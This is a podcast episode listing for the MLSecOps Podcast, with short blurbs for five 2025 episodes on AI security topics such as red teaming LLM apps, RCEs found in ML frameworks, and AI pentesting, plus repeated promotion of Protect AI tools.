
Season 3 Finale: Top Insights, Hacks, and Lessons from the Frontlines of AI Security
21/7/2025 | 24 min
Send us a textTo close out Season 3, we’re revisiting the standout insights, wildest vulnerabilities, and most practical lessons shared by 20+ AI practitioners, researchers, and industry leaders shaping the future of AI security. If you're building, breaking, or defending AI/ML systems, this is your must-listen roundup.Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/season-3-finale-top-insights-hacks-and-lessons-from-the-frontlines-of-ai-securityThanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com. Additional tools and resources to check out:Protect AI Guardian: Zero Trust for ML Models Recon: Automated Red Teaming for GenAI Protect AI’s ML Security-Focused Open Source Tools LLM Guard Open Source Security Toolkit for LLM Interactions Huntr - The World's First AI/Machine Learning Bug Bounty Platform

Breaking and Securing Real-World LLM Apps
16/7/2025 | 53 min
Send us a textFresh off their OWASP AppSec EU talk, Rico Komenda and Javan Rasokat join Charlie McCarthy to share real-world insights on breaking and securing LLM-integrated systems.Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/breaking-and-securing-real-world-llm-appsAsk ChatGPTThanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com. Additional tools and resources to check out:Protect AI Guardian: Zero Trust for ML Models Recon: Automated Red Teaming for GenAI Protect AI’s ML Security-Focused Open Source Tools LLM Guard Open Source Security Toolkit for LLM Interactions Huntr - The World's First AI/Machine Learning Bug Bounty Platform

How Red Teamers Are Exposing Flaws in AI Pipelines
09/7/2025 | 41 min
Send us a textProlific bug bounty hunter and Offensive Security Lead at Toreon, Robbe Van Roey (PinkDraconian), joins the MLSecOps Podcast to break down how he discovered RCEs in BentoML and LangChain, the risks of unsafe model serialization, and his approach to red teaming AI systems. Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/how-red-teamers-are-exposing-flaws-in-ai-pipelinesThanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com. Additional tools and resources to check out:Protect AI Guardian: Zero Trust for ML Models Recon: Automated Red Teaming for GenAI Protect AI’s ML Security-Focused Open Source Tools LLM Guard Open Source Security Toolkit for LLM Interactions Huntr - The World's First AI/Machine Learning Bug Bounty Platform

Securing AI for Government: Inside the Leidos + Protect AI Partnership
25/6/2025 | 34 min
Send us a textOn this episode of the MLSecOps Podcast, Rob Linger, Information Advantage Practice Lead at Leidos, join hosts Jessica Souder, Director of Government and Defense at Protect AI, and Charlie McCarthy to explore what it takes to deploy secure AI/ML systems in government environments.Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/securing-ai-for-government-inside-the-leidos-protect-ai-partnership.Thanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com. Additional tools and resources to check out:Protect AI Guardian: Zero Trust for ML Models Recon: Automated Red Teaming for GenAI Protect AI’s ML Security-Focused Open Source Tools LLM Guard Open Source Security Toolkit for LLM Interactions Huntr - The World's First AI/Machine Learning Bug Bounty Platform

Holistic AI Pentesting Playbook
13/6/2025 | 49 min
Send us a textJason Haddix, CEO of Arcanum Information Security, joins the MLSecOps Podcast to share his methods for assessing and defending AI systems.Full transcript, video, and links to episode resources available at https://mlsecops.com/podcast/holistic-ai-pentesting-playbook.Thanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com. Additional tools and resources to check out:Protect AI Guardian: Zero Trust for ML Models Recon: Automated Red Teaming for GenAI Protect AI’s ML Security-Focused Open Source Tools LLM Guard Open Source Security Toolkit for LLM Interactions Huntr - The World's First AI/Machine Learning Bug Bounty Platform



The MLSecOps Podcast